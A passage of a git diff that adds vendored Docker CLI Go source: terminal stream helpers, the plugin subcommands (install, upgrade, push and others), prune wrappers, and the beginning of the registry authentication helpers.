+// FD returns the file descriptor number for this stream
+func (o *OutStream) FD() uintptr {
+	return o.fd
+}
+
+// IsTerminal returns true if this stream is connected to a terminal
+func (o *OutStream) IsTerminal() bool {
+	return o.isTerminal
+}
+
+// SetRawTerminal sets raw mode on the output terminal
+func (o *OutStream) SetRawTerminal() (err error) {
+	if os.Getenv("NORAW") != "" || !o.isTerminal {
+		return nil
+	}
+	o.state, err = term.SetRawTerminalOutput(o.fd)
+	return err
+}
+
+// RestoreTerminal restores normal mode to the terminal
+func (o *OutStream) RestoreTerminal() {
+	if o.state != nil {
+		term.RestoreTerminal(o.fd, o.state)
+	}
+}
+
+// GetTtySize returns the height and width in characters of the tty
+func (o *OutStream) GetTtySize() (uint, uint) {
+	if !o.isTerminal {
+		return 0, 0
+	}
+	ws, err := term.GetWinsize(o.fd)
+	if err != nil {
+		logrus.Debugf("Error getting size: %s", err)
+		if ws == nil {
+			return 0, 0
+		}
+	}
+	return uint(ws.Height), uint(ws.Width)
+}
+
+// NewOutStream returns a new OutStream object from a Writer
+func NewOutStream(out io.Writer) *OutStream {
+	fd, isTerminal := term.GetFdInfo(out)
+	return &OutStream{out: out, fd: fd, isTerminal: isTerminal}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/cmd.go b/vendor/github.com/docker/docker/cli/command/plugin/cmd.go
new file mode 100644
index 0000000000..92c990a975
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/cmd.go
@@ -0,0 +1,31 @@
+package plugin
+
+import (
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+// NewPluginCommand returns a cobra command for `plugin` subcommands
+func NewPluginCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "plugin",
+		Short: "Manage plugins",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+	}
+
+	cmd.AddCommand(
+		newDisableCommand(dockerCli),
+		newEnableCommand(dockerCli),
+		newInspectCommand(dockerCli),
+		newInstallCommand(dockerCli),
+		newListCommand(dockerCli),
+		newRemoveCommand(dockerCli),
+		newSetCommand(dockerCli),
+		newPushCommand(dockerCli),
+		newCreateCommand(dockerCli),
+		newUpgradeCommand(dockerCli),
+	)
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/create.go b/vendor/github.com/docker/docker/cli/command/plugin/create.go
new file mode 100644
index 0000000000..2aab1e9e4a
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/create.go
@@ -0,0 +1,125 @@
+package plugin
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/reference"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+// validateTag checks if the given repoName can be resolved.
+func validateTag(rawRepo string) error {
+	_, err := reference.ParseNamed(rawRepo)
+
+	return err
+}
+
+// validateConfig ensures that a valid config.json is available in the given path
+func validateConfig(path string) error {
+	dt, err := os.Open(filepath.Join(path, "config.json"))
+	if err != nil {
+		return err
+	}
+
+	m := types.PluginConfig{}
+	err = json.NewDecoder(dt).Decode(&m)
+	dt.Close()
+
+	return err
+}
+
+// validateContextDir validates the given dir and returns abs path on success.
+func validateContextDir(contextDir string) (string, error) {
+	absContextDir, err := filepath.Abs(contextDir)
+
+	stat, err := os.Lstat(absContextDir)
+	if err != nil {
+		return "", err
+	}
+
+	if !stat.IsDir() {
+		return "", fmt.Errorf("context must be a directory")
+	}
+
+	return absContextDir, nil
+}
+
+type pluginCreateOptions struct {
+	repoName string
+	context  string
+	compress bool
+}
+
+func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	options := pluginCreateOptions{}
+
+	cmd := &cobra.Command{
+		Use:   "create [OPTIONS] PLUGIN PLUGIN-DATA-DIR",
+		Short: "Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory.",
+		Args:  cli.RequiresMinArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			options.repoName = args[0]
+			options.context = args[1]
+			return runCreate(dockerCli, options)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.BoolVar(&options.compress, "compress", false, "Compress the context using gzip")
+
+	return cmd
+}
+
+func runCreate(dockerCli *command.DockerCli, options pluginCreateOptions) error {
+	var (
+		createCtx io.ReadCloser
+		err       error
+	)
+
+	if err := validateTag(options.repoName); err != nil {
+		return err
+	}
+
+	absContextDir, err := validateContextDir(options.context)
+	if err != nil {
+		return err
+	}
+
+	if err := validateConfig(options.context); err != nil {
+		return err
+	}
+
+	compression := archive.Uncompressed
+	if options.compress {
+		logrus.Debugf("compression enabled")
+		compression = archive.Gzip
+	}
+
+	createCtx, err = archive.TarWithOptions(absContextDir, &archive.TarOptions{
+		Compression: compression,
+	})
+
+	if err != nil {
+		return err
+	}
+
+	ctx := context.Background()
+
+	createOptions := types.PluginCreateOptions{RepoName: options.repoName}
+	if err = dockerCli.Client().PluginCreate(ctx, createCtx, createOptions); err != nil {
+		return err
+	}
+	fmt.Fprintln(dockerCli.Out(), options.repoName)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/disable.go b/vendor/github.com/docker/docker/cli/command/plugin/disable.go
new file mode 100644
index 0000000000..07b0ec2288
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/disable.go
@@ -0,0 +1,36 @@
+package plugin
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+func newDisableCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var force bool
+
+	cmd := &cobra.Command{
+		Use:   "disable [OPTIONS] PLUGIN",
+		Short: "Disable a plugin",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runDisable(dockerCli, args[0], force)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&force, "force", "f", false, "Force the disable of an active plugin")
+	return cmd
+}
+
+func runDisable(dockerCli *command.DockerCli, name string, force bool) error {
+	if err := dockerCli.Client().PluginDisable(context.Background(), name, types.PluginDisableOptions{Force: force}); err != nil {
+		return err
+	}
+	fmt.Fprintln(dockerCli.Out(), name)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/enable.go b/vendor/github.com/docker/docker/cli/command/plugin/enable.go
new file mode 100644
index 0000000000..77762f4024
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/enable.go
@@ -0,0 +1,47 @@
+package plugin
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type enableOpts struct {
+	timeout int
+	name    string
+}
+
+func newEnableCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts enableOpts
+
+	cmd := &cobra.Command{
+		Use:   "enable [OPTIONS] PLUGIN",
+		Short: "Enable a plugin",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.name = args[0]
+			return runEnable(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.IntVar(&opts.timeout, "timeout", 0, "HTTP client timeout (in seconds)")
+	return cmd
+}
+
+func runEnable(dockerCli *command.DockerCli, opts *enableOpts) error {
+	name := opts.name
+	if opts.timeout < 0 {
+		return fmt.Errorf("negative timeout %d is invalid", opts.timeout)
+	}
+
+	if err := dockerCli.Client().PluginEnable(context.Background(), name, types.PluginEnableOptions{Timeout: opts.timeout}); err != nil {
+		return err
+	}
+	fmt.Fprintln(dockerCli.Out(), name)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/inspect.go b/vendor/github.com/docker/docker/cli/command/plugin/inspect.go
new file mode 100644
index 0000000000..c2c7a0d6bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/inspect.go
@@ -0,0 +1,42 @@
+package plugin
+
+import (
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/inspect"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type inspectOptions struct {
+	pluginNames []string
+	format      string
+}
+
+func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts inspectOptions
+
+	cmd := &cobra.Command{
+		Use:   "inspect [OPTIONS] PLUGIN [PLUGIN...]",
+		Short: "Display detailed information on one or more plugins",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.pluginNames = args
+			return runInspect(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+	return cmd
+}
+
+func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+	getRef := func(ref string) (interface{}, []byte, error) {
+		return client.PluginInspectWithRaw(ctx, ref)
+	}
+
+	return inspect.Inspect(dockerCli.Out(), opts.pluginNames, opts.format, getRef)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/install.go b/vendor/github.com/docker/docker/cli/command/plugin/install.go
new file mode 100644
index 0000000000..2c3170c54a
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/install.go
@@ -0,0 +1,208 @@
+package plugin
+
+import (
+	"bufio"
+	"errors"
+	"fmt"
+	"strings"
+
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/image"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+	"golang.org/x/net/context"
+)
+
+type pluginOptions struct {
+	remote          string
+	localName       string
+	grantPerms      bool
+	disable         bool
+	args            []string
+	skipRemoteCheck bool
+}
+
+func loadPullFlags(opts *pluginOptions, flags *pflag.FlagSet) {
+	flags.BoolVar(&opts.grantPerms, "grant-all-permissions", false, "Grant all permissions necessary to run the plugin")
+	command.AddTrustedFlags(flags, true)
+}
+
+func newInstallCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var options pluginOptions
+	cmd := &cobra.Command{
+		Use:   "install [OPTIONS] PLUGIN [KEY=VALUE...]",
+		Short: "Install a plugin",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			options.remote = args[0]
+			if len(args) > 1 {
+				options.args = args[1:]
+			}
+			return runInstall(dockerCli, options)
+		},
+	}
+
+	flags := cmd.Flags()
+	loadPullFlags(&options, flags)
+	flags.BoolVar(&options.disable, "disable", false, "Do not enable the plugin on install")
+	flags.StringVar(&options.localName, "alias", "", "Local name for plugin")
+	return cmd
+}
+
+func getRepoIndexFromUnnormalizedRef(ref distreference.Named) (*registrytypes.IndexInfo, error) {
+	named, err := reference.ParseNamed(ref.Name())
+	if err != nil {
+		return nil, err
+	}
+
+	repoInfo, err := registry.ParseRepositoryInfo(named)
+	if err != nil {
+		return nil, err
+	}
+
+	return repoInfo.Index, nil
+}
+
+type pluginRegistryService struct {
+	registry.Service
+}
+
+func (s pluginRegistryService) ResolveRepository(name reference.Named) (repoInfo *registry.RepositoryInfo, err error) {
+	repoInfo, err = s.Service.ResolveRepository(name)
+	if repoInfo != nil {
+		repoInfo.Class = "plugin"
+	}
+	return
+}
+
+func newRegistryService() registry.Service {
+	return pluginRegistryService{
+		Service: registry.NewService(registry.ServiceOptions{V2Only: true}),
+	}
+}
+
+func buildPullConfig(ctx context.Context, dockerCli *command.DockerCli, opts pluginOptions, cmdName string) (types.PluginInstallOptions, error) {
+	// Parse name using distribution reference package to support name
+	// containing both tag and digest. Names with both tag and digest
+	// will be treated by the daemon as a pull by digest with
+	// an alias for the tag (if no alias is provided).
+	ref, err := distreference.ParseNamed(opts.remote)
+	if err != nil {
+		return types.PluginInstallOptions{}, err
+	}
+
+	index, err := getRepoIndexFromUnnormalizedRef(ref)
+	if err != nil {
+		return types.PluginInstallOptions{}, err
+	}
+
+	repoInfoIndex, err := getRepoIndexFromUnnormalizedRef(ref)
+	if err != nil {
+		return types.PluginInstallOptions{}, err
+	}
+	remote := ref.String()
+
+	_, isCanonical := ref.(distreference.Canonical)
+	if command.IsTrusted() && !isCanonical {
+		var nt reference.NamedTagged
+		named, err := reference.ParseNamed(ref.Name())
+		if err != nil {
+			return types.PluginInstallOptions{}, err
+		}
+		if tagged, ok := ref.(distreference.Tagged); ok {
+			nt, err = reference.WithTag(named, tagged.Tag())
+			if err != nil {
+				return types.PluginInstallOptions{}, err
+			}
+		} else {
+			named = reference.WithDefaultTag(named)
+			nt = named.(reference.NamedTagged)
+		}
+
+		ctx := context.Background()
+		trusted, err := image.TrustedReference(ctx, dockerCli, nt, newRegistryService())
+		if err != nil {
+			return types.PluginInstallOptions{}, err
+		}
+		remote = trusted.String()
+	}
+
+	authConfig := command.ResolveAuthConfig(ctx, dockerCli, index)
+
+	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
+	if err != nil {
+		return types.PluginInstallOptions{}, err
+	}
+
+	registryAuthFunc := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfoIndex, cmdName)
+
+	options := types.PluginInstallOptions{
+		RegistryAuth:          encodedAuth,
+		RemoteRef:             remote,
+		Disabled:              opts.disable,
+		AcceptAllPermissions:  opts.grantPerms,
+		AcceptPermissionsFunc: acceptPrivileges(dockerCli, opts.remote),
+		// TODO: Rename PrivilegeFunc, it has nothing to do with privileges
+		PrivilegeFunc: registryAuthFunc,
+		Args:          opts.args,
+	}
+	return options, nil
+}
+
+func runInstall(dockerCli *command.DockerCli, opts pluginOptions) error {
+	var localName string
+	if opts.localName != "" {
+		aref, err := reference.ParseNamed(opts.localName)
+		if err != nil {
+			return err
+		}
+		aref = reference.WithDefaultTag(aref)
+		if _, ok := aref.(reference.NamedTagged); !ok {
+			return fmt.Errorf("invalid name: %s", opts.localName)
+		}
+		localName = aref.String()
+	}
+
+	ctx := context.Background()
+	options, err := buildPullConfig(ctx, dockerCli, opts, "plugin install")
+	if err != nil {
+		return err
+	}
+	responseBody, err := dockerCli.Client().PluginInstall(ctx, localName, options)
+	if err != nil {
+		if strings.Contains(err.Error(), "target is image") {
+			return errors.New(err.Error() + " - Use `docker image pull`")
+		}
+		return err
+	}
+	defer responseBody.Close()
+	if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil {
+		return err
+	}
+	fmt.Fprintf(dockerCli.Out(), "Installed plugin %s\n", opts.remote) // todo: return proper values from the API for this result
+	return nil
+}
+
+func acceptPrivileges(dockerCli *command.DockerCli, name string) func(privileges types.PluginPrivileges) (bool, error) {
+	return func(privileges types.PluginPrivileges) (bool, error) {
+		fmt.Fprintf(dockerCli.Out(), "Plugin %q is requesting the following privileges:\n", name)
+		for _, privilege := range privileges {
+			fmt.Fprintf(dockerCli.Out(), " - %s: %v\n", privilege.Name, privilege.Value)
+		}
+
+		fmt.Fprint(dockerCli.Out(), "Do you grant the above permissions? [y/N] ")
+		reader := bufio.NewReader(dockerCli.In())
+		line, _, err := reader.ReadLine()
+		if err != nil {
+			return false, err
+		}
+		return strings.ToLower(string(line)) == "y", nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/list.go b/vendor/github.com/docker/docker/cli/command/plugin/list.go
new file mode 100644
index 0000000000..8fd16dae3f
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/list.go
@@ -0,0 +1,63 @@
+package plugin
+
+import (
+	"fmt"
+	"strings"
+	"text/tabwriter"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type listOptions struct {
+	noTrunc bool
+}
+
+func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts listOptions
+
+	cmd := &cobra.Command{
+		Use:     "ls [OPTIONS]",
+		Short:   "List plugins",
+		Aliases: []string{"list"},
+		Args:    cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runList(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output")
+
+	return cmd
+}
+
+func runList(dockerCli *command.DockerCli, opts listOptions) error {
+	plugins, err := dockerCli.Client().PluginList(context.Background())
+	if err != nil {
+		return err
+	}
+
+	w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0)
+	fmt.Fprintf(w, "ID \tNAME \tDESCRIPTION\tENABLED")
+	fmt.Fprintf(w, "\n")
+
+	for _, p := range plugins {
+		id := p.ID
+		desc := strings.Replace(p.Config.Description, "\n", " ", -1)
+		desc = strings.Replace(desc, "\r", " ", -1)
+		if !opts.noTrunc {
+			id = stringid.TruncateID(p.ID)
+			desc = stringutils.Ellipsis(desc, 45)
+		}
+
+		fmt.Fprintf(w, "%s\t%s\t%s\t%v\n", id, p.Name, desc, p.Enabled)
+	}
+	w.Flush()
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/push.go b/vendor/github.com/docker/docker/cli/command/plugin/push.go
new file mode 100644
index 0000000000..9abb38ec0b
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/push.go
@@ -0,0 +1,71 @@
+package plugin
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/image"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/spf13/cobra"
+)
+
+func newPushCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "push [OPTIONS] PLUGIN[:TAG]",
+		Short: "Push a plugin to a registry",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runPush(dockerCli, args[0])
+		},
+	}
+
+	flags := cmd.Flags()
+
+	command.AddTrustedFlags(flags, true)
+
+	return cmd
+}
+
+func runPush(dockerCli *command.DockerCli, name string) error {
+	named, err := reference.ParseNamed(name) // FIXME: validate
+	if err != nil {
+		return err
+	}
+	if reference.IsNameOnly(named) {
+		named = reference.WithDefaultTag(named)
+	}
+	ref, ok := named.(reference.NamedTagged)
+	if !ok {
+		return fmt.Errorf("invalid name: %s", named.String())
+	}
+
+	ctx := context.Background()
+
+	repoInfo, err := registry.ParseRepositoryInfo(named)
+	if err != nil {
+		return err
+	}
+	authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index)
+
+	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
+	if err != nil {
+		return err
+	}
+	responseBody, err := dockerCli.Client().PluginPush(ctx, ref.String(), encodedAuth)
+	if err != nil {
+		return err
+	}
+	defer responseBody.Close()
+
+	if command.IsTrusted() {
+		repoInfo.Class = "plugin"
+		return image.PushTrustedReference(dockerCli, repoInfo, named, authConfig, responseBody)
+	}
+
+	return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/remove.go b/vendor/github.com/docker/docker/cli/command/plugin/remove.go
new file mode 100644
index 0000000000..9f3aba9a01
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/remove.go
@@ -0,0 +1,55 @@
+package plugin
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type rmOptions struct {
+	force bool
+
+	plugins []string
+}
+
+func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts rmOptions
+
+	cmd := &cobra.Command{
+		Use:     "rm [OPTIONS] PLUGIN [PLUGIN...]",
+		Short:   "Remove one or more plugins",
+		Aliases: []string{"remove"},
+		Args:    cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.plugins = args
+			return runRemove(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of an active plugin")
+	return cmd
+}
+
+func runRemove(dockerCli *command.DockerCli, opts *rmOptions) error {
+	ctx := context.Background()
+
+	var errs cli.Errors
+	for _, name := range opts.plugins {
+		// TODO: pass names to api instead of making multiple api calls
+		if err := dockerCli.Client().PluginRemove(ctx, name, types.PluginRemoveOptions{Force: opts.force}); err != nil {
+			errs = append(errs, err)
+			continue
+		}
+		fmt.Fprintln(dockerCli.Out(), name)
+	}
+	// Do not simplify to `return errs` because even if errs == nil, it is not a nil-error interface value.
+	if errs != nil {
+		return errs
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/set.go b/vendor/github.com/docker/docker/cli/command/plugin/set.go
new file mode 100644
index 0000000000..52b09fb500
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/set.go
@@ -0,0 +1,22 @@
+package plugin
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+func newSetCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "set PLUGIN KEY=VALUE [KEY=VALUE...]",
+		Short: "Change settings for a plugin",
+		Args:  cli.RequiresMinArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return dockerCli.Client().PluginSet(context.Background(), args[0], args[1:])
+		},
+	}
+
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go b/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go
new file mode 100644
index 0000000000..d212cd7e52
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go
@@ -0,0 +1,100 @@
+package plugin
+
+import (
+	"bufio"
+	"context"
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/reference"
+	"github.com/pkg/errors"
+	"github.com/spf13/cobra"
+)
+
+func newUpgradeCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var options pluginOptions
+	cmd := &cobra.Command{
+		Use:   "upgrade [OPTIONS] PLUGIN [REMOTE]",
+		Short: "Upgrade an existing plugin",
+		Args:  cli.RequiresRangeArgs(1, 2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			options.localName = args[0]
+			if len(args) == 2 {
+				options.remote = args[1]
+			}
+			return runUpgrade(dockerCli, options)
+		},
+	}
+
+	flags := cmd.Flags()
+	loadPullFlags(&options, flags)
+	flags.BoolVar(&options.skipRemoteCheck, "skip-remote-check", false, "Do not check if specified remote plugin matches existing plugin image")
+	return cmd
+}
+
+func runUpgrade(dockerCli *command.DockerCli, opts pluginOptions) error {
+	ctx := context.Background()
+	p, _, err := dockerCli.Client().PluginInspectWithRaw(ctx, opts.localName)
+	if err != nil {
+		return fmt.Errorf("error reading plugin data: %v", err)
+	}
+
+	if p.Enabled {
+		return fmt.Errorf("the plugin must be disabled before upgrading")
+	}
+
+	opts.localName = p.Name
+	if opts.remote == "" {
+		opts.remote = p.PluginReference
+	}
+	remote, err := reference.ParseNamed(opts.remote)
+	if err != nil {
+		return errors.Wrap(err, "error parsing remote upgrade image reference")
+	}
+	remote = reference.WithDefaultTag(remote)
+
+	old, err := reference.ParseNamed(p.PluginReference)
+	if err != nil {
+		return errors.Wrap(err, "error parsing current image reference")
+	}
+	old = reference.WithDefaultTag(old)
+
+	fmt.Fprintf(dockerCli.Out(), "Upgrading plugin %s from %s to %s\n", p.Name, old, remote)
+	if !opts.skipRemoteCheck && remote.String() != old.String() {
+		_, err := fmt.Fprint(dockerCli.Out(), "Plugin images do not match, are you sure? ")
+		if err != nil {
+			return errors.Wrap(err, "error writing to stdout")
+		}
+
+		rdr := bufio.NewReader(dockerCli.In())
+		line, _, err := rdr.ReadLine()
+		if err != nil {
+			return errors.Wrap(err, "error reading from stdin")
+		}
+		if strings.ToLower(string(line)) != "y" {
+			return errors.New("canceling upgrade request")
+		}
+	}
+
+	options, err := buildPullConfig(ctx, dockerCli, opts, "plugin upgrade")
+	if err != nil {
+		return err
+	}
+
+	responseBody, err := dockerCli.Client().PluginUpgrade(ctx, opts.localName, options)
+	if err != nil {
+		if strings.Contains(err.Error(), "target is image") {
+			return errors.New(err.Error() + " - Use `docker image pull`")
+		}
+		return err
+	}
+	defer responseBody.Close()
+	if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil {
+		return err
+	}
+	fmt.Fprintf(dockerCli.Out(), "Upgraded plugin %s to %s\n", opts.localName, opts.remote) // todo: return proper values from the API for this result
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/prune/prune.go b/vendor/github.com/docker/docker/cli/command/prune/prune.go
new file mode 100644
index 0000000000..a022487fd6
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/prune/prune.go
@@ -0,0 +1,50 @@
+package prune
+
+import (
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/container"
+	"github.com/docker/docker/cli/command/image"
+	"github.com/docker/docker/cli/command/network"
+	"github.com/docker/docker/cli/command/volume"
+	"github.com/spf13/cobra"
+)
+
+// NewContainerPruneCommand returns a cobra prune command for containers
+func NewContainerPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
+	return container.NewPruneCommand(dockerCli)
+}
+
+// NewVolumePruneCommand returns a cobra prune command for volumes
+func NewVolumePruneCommand(dockerCli *command.DockerCli) *cobra.Command {
+	return volume.NewPruneCommand(dockerCli)
+}
+
+// NewImagePruneCommand returns a cobra prune command for images
+func NewImagePruneCommand(dockerCli *command.DockerCli) *cobra.Command {
+	return image.NewPruneCommand(dockerCli)
+}
+
+// NewNetworkPruneCommand returns a cobra prune command for Networks
+func NewNetworkPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
+	return network.NewPruneCommand(dockerCli)
+}
+
+// RunContainerPrune executes a prune command for containers
+func RunContainerPrune(dockerCli *command.DockerCli) (uint64, string, error) {
+	return container.RunPrune(dockerCli)
+}
+
+// RunVolumePrune executes a prune command for volumes
+func RunVolumePrune(dockerCli *command.DockerCli) (uint64, string, error) {
+	return volume.RunPrune(dockerCli)
+}
+
+// RunImagePrune executes a prune command for images
+func RunImagePrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) {
+	return image.RunPrune(dockerCli, all)
+}
+
+// RunNetworkPrune executes a prune command for networks
+func RunNetworkPrune(dockerCli *command.DockerCli) (uint64, string, error) {
+	return network.RunPrune(dockerCli)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/registry.go b/vendor/github.com/docker/docker/cli/command/registry.go
new file mode 100644
index 0000000000..65f6b3309e
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/registry.go
@@ -0,0 +1,186 @@
+package command
+
+import (
+	"bufio"
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io"
+	"os"
+	"runtime"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/pkg/term"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+)
+
+// ElectAuthServer returns the default registry to use (by asking the daemon)
+func ElectAuthServer(ctx context.Context, cli *DockerCli) string {
+	// The daemon `/info` endpoint informs us of the default registry being
+	// used. This is essential in cross-platforms environment, where for
+	// example a Linux client might be interacting with a Windows daemon, hence
+	// the default registry URL might be Windows specific.
+	serverAddress := registry.IndexServer
+	if info, err := cli.Client().Info(ctx); err != nil {
+		fmt.Fprintf(cli.Out(), "Warning: failed to get default registry endpoint from daemon (%v). Using system default: %s\n", err, serverAddress)
+	} else {
+		serverAddress = info.IndexServerAddress
+	}
+	return serverAddress
+}
+
+// EncodeAuthToBase64 serializes the auth configuration as JSON base64 payload
+func EncodeAuthToBase64(authConfig types.AuthConfig) (string, error) {
+	buf, err := json.Marshal(authConfig)
+	if err != nil {
+		return "", err
+	}
+	return base64.URLEncoding.EncodeToString(buf), nil
+}
+
+// RegistryAuthenticationPrivilegedFunc returns a RequestPrivilegeFunc from the specified registry index info
+// for the given command.
+func RegistryAuthenticationPrivilegedFunc(cli *DockerCli, index *registrytypes.IndexInfo, cmdName string) types.RequestPrivilegeFunc {
+	return func() (string, error) {
+		fmt.Fprintf(cli.Out(), "\nPlease login prior to %s:\n", cmdName)
+		indexServer := registry.GetAuthConfigKey(index)
+		isDefaultRegistry := indexServer == ElectAuthServer(context.Background(), cli)
+		authConfig, err := ConfigureAuth(cli, "", "", indexServer, isDefaultRegistry)
+		if err != nil {
+			return "", err
+		}
+		return EncodeAuthToBase64(authConfig)
+	}
+}
+
+// ResolveAuthConfig is like registry.ResolveAuthConfig, but if using the
